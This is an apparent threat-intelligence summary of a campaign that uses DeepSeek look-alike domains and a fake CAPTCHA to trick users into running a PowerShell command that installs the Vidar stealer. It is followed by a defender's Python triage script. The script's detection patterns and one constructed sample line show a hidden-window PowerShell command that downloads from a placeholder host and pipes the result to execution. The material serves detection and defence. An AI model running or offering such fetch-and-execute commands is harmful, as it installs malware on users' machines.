DeepSeek Lure Used To Spread Malware
NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY :
Cybercriminals are exploiting DeepSeek's popularity by registering look-alike domains that deliver the Vidar information stealer. The attack chain starts at a deceptive website that prompts users to complete a fake partner registration, which leads to a malicious CAPTCHA page. That page injects a PowerShell command into the user's clipboard; when the user pastes and executes it, the command downloads and launches the Vidar malware. Vidar targets cryptocurrency wallets, browser data, and sensitive files, and uses Telegram and Steam for C2 communication. The campaign illustrates how quickly threat actors exploit the popularity of new AI technologies and underlines the need for stronger security controls and user education.
OPENCTI LABELS :
vidar,cryptocurrency,captcha,brand impersonation,deepseek,clipboard injection
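The clipboard-injection step described in the summary leaves a recognisable footprint on the endpoint: a PowerShell process started interactively by the victim whose command line combines a download primitive with an execution primitive and window-hiding or policy-bypass flags. The following triage script is an added example for defenders, not code from the report or from NetmanageIT; it scores constructed process-creation records against that pattern. The assumption that the pasted command is spawned from the desktop shell (explorer.exe as parent) is mine, not something the report states, and the domain lookalike-domain.invalid is a placeholder, not an indicator from the campaign.

```python
"""Heuristic triage of process-creation events for clipboard-lure PowerShell execution.

Added example (not from the OpenCTI report). Sample events are constructed; the
domain used in them is a placeholder, not an indicator from the campaign.
"""
import re
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class ProcEvent:
    image: str    # full path of the created process
    parent: str   # full path of the parent process
    cmdline: str  # command line as logged


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)


# Download primitives commonly seen in paste-and-run lures.
DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer", re.I)
# Execution primitives that run what was just fetched.
EXECUTE = re.compile(r"invoke-expression|\biex\b|start-process|\bsaps\b", re.I)
# Flags that hide the window, skip profiles, pass encoded payloads or bypass policy.
EVASION = re.compile(
    r"-w(indowstyle)?\s+h(idden)?\b|-nop(rofile)?\b|"
    r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|-(ep|executionpolicy)\s+bypass", re.I)
# Assumption (not stated in the report): a command the victim pastes into the Run
# dialog or a shell is launched from the desktop shell, so explorer.exe is its parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
ALERT_THRESHOLD = 6


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> Finding:
    """Score one process-creation event; non-PowerShell events score 0."""
    f = Finding()
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return f
    if basename(ev.parent) in INTERACTIVE_PARENTS:
        f.score += 2
        f.reasons.append("powershell started interactively from the desktop shell")
    if DOWNLOAD.search(ev.cmdline):
        f.score += 2
        f.reasons.append("download primitive in command line")
    if EXECUTE.search(ev.cmdline):
        f.score += 2
        f.reasons.append("execution primitive in command line")
    if EVASION.search(ev.cmdline):
        f.score += 1
        f.reasons.append("hidden window / no profile / encoded command / policy bypass")
    return f


def triage(events: List[ProcEvent]) -> List[Tuple[ProcEvent, Finding]]:
    """Return the events whose score reaches ALERT_THRESHOLD, with their reasons."""
    alerts = []
    for ev in events:
        f = score_event(ev)
        if f.score >= ALERT_THRESHOLD:
            alerts.append((ev, f))
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events: one paste-and-run lure, one scheduled maintenance script,
# one plain interactive console, one unrelated cmd.exe, one manual download without execution.
SAMPLE_EVENTS = [
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              r'powershell -w hidden -c "iwr http://lookalike-domain.invalid/a | iex"'),
    ProcEvent(PS, r"C:\Program Files\Backup\agent.exe",
              r"powershell -NoProfile -File C:\scripts\rotate-logs.ps1"),
    ProcEvent(PS, r"C:\Windows\explorer.exe", "powershell"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd /c dir"),
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              r'powershell -nop -c "Invoke-WebRequest -Uri https://mirror.invalid/t.zip -OutFile t.zip"'),
]

if __name__ == "__main__":
    for ev, f in triage(SAMPLE_EVENTS):
        print(f"ALERT score={f.score} parent={basename(ev.parent)} cmd={ev.cmdline}")
        for r in f.reasons:
            print("  -", r)
```

Only the first constructed event crosses the threshold: the manual Invoke-WebRequest with -OutFile scores on download and evasion but not on execution, so it stays below the alert line, which keeps an administrator fetching a file by hand from paging anyone. In production the same scoring would run over Sysmon event ID 1 or Windows Security 4688 records with command-line auditing enabled.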